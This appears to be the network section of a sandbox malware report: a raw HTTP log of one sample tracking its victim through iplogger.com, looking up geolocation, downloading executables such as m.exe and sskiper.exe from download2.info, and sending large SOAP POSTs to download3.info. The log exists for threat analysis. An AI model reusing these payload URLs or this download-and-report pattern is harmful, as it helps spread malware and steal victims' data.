Network Analysis

GET /1jwpj7 HTTP/1.1 User-Agent: Approved 1.2/2 Host: iplogger.com

HTTP/1.1 200 OK Server: nginx Date: Fri, 23 Apr 2021 09:19:33 GMT Content-Type: image/png Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: PHPSESSID=f980jq1vj8gqh4pjujjk518pk0; path=/; HttpOnly Pragma: no-cache Set-Cookie: clhf03028ja=175.208.134.150; expires=Wed, 18-Jul-2029 05:49:51 GMT; Max-Age=259878618; path=/ Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Cache-Control: no-cache Expires: Thu, 01 Jan 1970 00:00:01 GMT Answers: whoami: ce06714adc72bd8f0236a6b19287c89d00bfd7a40bfd71b6b9c21d3a6e282945 Strict-Transport-Security: max-age=31536000; preload X-Frame-Options: DENY

GET /1jepj7 HTTP/1.1 User-Agent: Approved 1.2/2 Host: iplogger.com Cookie: PHPSESSID=f980jq1vj8gqh4pjujjk518pk0; clhf03028ja=175.208.134.150

HTTP/1.1 200 OK Server: nginx Date: Fri, 23 Apr 2021 09:19:33 GMT Content-Type: image/png Transfer-Encoding: chunked Connection: keep-alive Pragma: no-cache Set-Cookie: clhf03028ja=175.208.134.150; expires=Wed, 18-Jul-2029 05:49:51 GMT; Max-Age=259878618; path=/ Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Cache-Control: no-cache Expires: Thu, 01 Jan 1970 00:00:01 GMT Answers: 1 whoami: ce06714adc72bd8f0236a6b19287c89d00bfd7a40bfd71b6b9c21d3a6e282945 Strict-Transport-Security: max-age=31536000; preload X-Frame-Options: DENY

GET /SystemCollectionsGenericSystemQueueDebugViewL HTTP/1.1 Host: h.fastihost.ru Connection: Keep-Alive

HTTP/1.1 200 OK Date: Fri, 23 Apr 2021 09:19:38 GMT Content-Type: text/html Content-Length: 310739 Connection: keep-alive Server: Jino.ru/mod_pizza Last-Modified: Thu, 22 Apr 2021 21:26:40 GMT ETag: "52fc6bc-4bdd3-5c09655cde974" Accept-Ranges: bytes

GET /SystemCollectionsGenericSystemQueueDebugViewL HTTP/1.1 Host: h.fastihost.ru

HTTP/1.1 200 OK Date: Fri, 23 Apr 2021 09:19:46 GMT Content-Type: text/html Content-Length: 310739 Connection: keep-alive Server: Jino.ru/mod_pizza Last-Modified: Thu, 22 Apr 2021 21:26:40 GMT ETag: "52fc6bc-4bdd3-5c09655cde974" Accept-Ranges: bytes

GET /geoip HTTP/1.1 Host: api.ip.sb Connection: Keep-Alive

HTTP/1.1 200 OK Date: Fri, 23 Apr 2021 09:20:01 GMT Content-Type: application/json; charset=utf-8 Content-Length: 349 Connection: keep-alive Set-Cookie: __cfduid=d6f87c9e2549c8fd9576c02899b0f0abd1619169600; expires=Sun, 23-May-21 09:20:00 GMT; path=/; domain=.ip.sb; HttpOnly; SameSite=Lax Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: no-cache Access-Control-Allow-Origin: * CF-Cache-Status: DYNAMIC cf-request-id: 099fa07d450000e4cca70da000000001 Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct" Report-To: {"group":"cf-nel","endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=dmZpRH7xXCQcdkM%2BF5R3%2FJkph2iSvBVY2XACm39F1I1bd6TnPeQtV2NSypx3wyTRiWRKusKwoK9CgQuaC59fhdE7r0lDOGC79Ec%3D"}],"max_age":604800} NEL: {"max_age":604800,"report_to":"cf-nel"} Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Server: cloudflare CF-RAY: 644603753c32e4cc-LAX

GET /SystemDataOleDbOleDbServicesWrapperc HTTP/1.1 Host: kis-easy.ru Connection: Keep-Alive

HTTP/1.1 200 OK Date: Fri, 23 Apr 2021 09:20:02 GMT Content-Type: text/html Content-Length: 310743 Connection: keep-alive Server: Jino.ru/mod_pizza Last-Modified: Fri, 23 Apr 2021 08:53:43 GMT ETag: "9222e08-4bdd7-5c09feee04be9" Accept-Ranges: bytes

GET /geoip HTTP/1.1 Host: api.ip.sb Connection: Keep-Alive

HTTP/1.1 200 OK Date: Fri, 23 Apr 2021 09:20:17 GMT Content-Type: application/json; charset=utf-8 Content-Length: 349 Connection: keep-alive Set-Cookie: __cfduid=d503ad2be9694076ad836b6f0de1637201619169616; expires=Sun, 23-May-21 09:20:16 GMT; path=/; domain=.ip.sb; HttpOnly; SameSite=Lax Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: no-cache Access-Control-Allow-Origin: * CF-Cache-Status: DYNAMIC cf-request-id: 099fa0bc2f000035e0a7b75000000001 Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct" Report-To: {"max_age":604800,"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=8XDTGEbBSV%2B2fxv5M4qqn9QmfItU9km58qRfU8cna0Uugh1T53WEEWQqr4ZuyMBn170sIWOMsNkhh0Lk5KKUteyXG7J6BNLyO18%3D"}],"group":"cf-nel"} NEL: {"report_to":"cf-nel","max_age":604800} Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Server: cloudflare CF-RAY: 644603d9effe35e0-LAX

GET /users/content/id03084901/mmow.txt HTTP/1.1 User-Agent: Installed OK 1.0/3 Host: download2.info

HTTP/1.1 301 Moved Permanently Server: nginx/1.14.2 Date: Fri, 23 Apr 2021 09:19:35 GMT Content-Type: text/html; charset=iso-8859-1 Content-Length: 260 Location: http://download2.info/function/v2tmp/momomoomomom.php Connection: keep-alive

GET /function/v2tmp/momomoomomom.php HTTP/1.1 User-Agent: Installed OK 1.0/3 Host: download2.info Connection: Keep-Alive

HTTP/1.1 200 OK Server: nginx/1.14.2 Date: Fri, 23 Apr 2021 09:19:35 GMT Content-Type: application/octet-stream Content-Length: 120832 Connection: keep-alive Content-Disposition: attachment; filename=m.exe

GET /users/content/id4843920512/sskiperus_part2.txt HTTP/1.1 User-Agent: Install Soft Solutions 1.0/3 Host: download2.info

HTTP/1.1 301 Moved Permanently Server: nginx/1.14.2 Date: Fri, 23 Apr 2021 09:19:53 GMT Content-Type: text/html; charset=iso-8859-1 Content-Length: 258 Location: http://download2.info/function/v2tmp/sskiperus2.php Connection: keep-alive

GET /function/v2tmp/sskiperus2.php HTTP/1.1 User-Agent: Install Soft Solutions 1.0/3 Host: download2.info Connection: Keep-Alive

HTTP/1.1 200 OK Server: nginx/1.14.2 Date: Fri, 23 Apr 2021 09:19:54 GMT Content-Type: application/octet-stream Content-Length: 120832 Connection: keep-alive Content-Disposition: attachment; filename=sskiper.exe

POST // HTTP/1.1 Content-Type: text/xml; charset=utf-8 SOAPAction: "http://tempuri.org/Endpoint/GetArguments" Host: download3.info Content-Length: 137 Expect: 100-continue Accept-Encoding: gzip, deflate Connection: Keep-Alive

HTTP/1.1 100 Continue

POST // HTTP/1.1 Content-Type: text/xml; charset=utf-8 SOAPAction: "http://tempuri.org/Endpoint/VerifyScanRequest" Host: download3.info Content-Length: 71482 Expect: 100-continue Accept-Encoding: gzip, deflate

HTTP/1.1 100 Continue

POST // HTTP/1.1 Content-Type: text/xml; charset=utf-8 SOAPAction: "http://tempuri.org/Endpoint/GetUpdates" Host: download3.info Content-Length: 71468 Expect: 100-continue Accept-Encoding: gzip, deflate

HTTP/1.1 100 Continue